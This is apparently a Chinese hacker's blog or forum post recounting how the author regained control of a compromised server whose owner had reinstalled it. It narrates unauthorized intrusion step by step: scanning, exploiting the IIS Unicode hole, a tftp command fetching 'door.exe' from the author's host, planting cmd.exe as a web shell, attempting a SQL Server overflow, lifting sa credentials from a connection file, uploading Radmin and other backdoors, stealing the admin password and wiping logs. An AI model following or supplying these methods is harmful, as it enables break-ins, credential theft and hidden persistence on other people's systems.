一次黑回丢失的肉鸡的经历

今天发现一个最重要的肉鸡挂了，以前的所有后门都没了。感觉是管理员发现后重装机器了，郁闷啊。

上面有我重要的资料，得找回来。

开工

1.扫端口，发现只开了80和3389,3389用以前的帐号没法登陆了，老实的扫描吧

2.用x-scan扫，全选，只扫到了U漏洞，有了一个guest权限的cmd了，呵呵

3.基本上只有用ftp脚本和tftp传文件了，试试，echo写脚本，晕不行啊，真TMD的

BT啊，连echo都不行，换tftp -i xxx.xxx.xxx.xxx get door.exe,靠，还是不行，接着

试net start,netstat -an,都不行，管理员还是比较厉害的。

4.想其他办法了,在扫，发现21开了，是serv-u,但是还没有ini文件，估计正在装，

我一想，不会是今天才装的机器吧，呆会一打补丁我的 U漏洞不是就没了吗，赶

快想办法，最后复制了一个cmd.exe到c:/Inetpub/scripts里面。

5.果然，机器重起后U漏洞没了，英明啊，继续，serv-u的servudaemon.ini出来

了，是5.0.0.0的，但是只有一个管理帐号,MD5加密的，除了爆破，没法了，不想

爆破，继续等。

6.过了几分种发现1433开了，一扫,8.0.194的,hello漏洞，可以溢出也,马上到肉鸡

上去，用sqlhello溢出，郁闷，怎么连不上1433了呢，又等了几分钟，机器又TMD

的重起了,1433能连上了，但是8.0.766的了，没法溢出，这个BT打补丁倒挺快的

嘛。

7.想了想，装数据库干嘛，只有网页，肯定是web数据库，web里肯定有连接数据

库的代码，用scripts里的cmd浏览硬盘，没有任何和网页有关的目录啊，访问一下

80,切，"您要查看的页当前不可用。网站可能遇到技术问题，或者您需要调整浏

览器设置。",网页还没放上来，继续等吧.

8.过了几分钟再访问网页，可以了，赶快浏览目录，在D盘找到了他的web的目

录，一个个的分析，最后在dbconnect.asp里找到了SQL的连接代码，居然是用sa连

接的，密码很长很复杂，运气真TMD好啊

9.用sqlexec连上去，不建帐号了，管理员肯定还在，写FTP脚本，把radmin传上

去，安装,OK,然后装其他一系列的后门，找到管理员的密码，清脚印，一切都搞

定.